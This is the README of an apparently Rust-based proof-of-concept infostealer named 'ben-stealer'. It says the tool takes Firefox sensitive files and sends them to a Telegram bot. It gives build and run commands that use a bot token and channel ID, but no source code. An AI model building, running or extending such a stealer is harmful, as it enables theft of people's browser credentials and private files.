# ben-stealer

Proof of concept malware that steals files from a base directory and sends them through Telegram.

Steals only Firefox sensitive files for now, delivers them to a Telegram bot.

It is supposed to run on Windows, MacOS and Linux. (Not tested yet)

## Build

> cargo build [--release]

## Usage

> BOT_TOKEN=abc CHANNEL_ID=123 ben-stealer
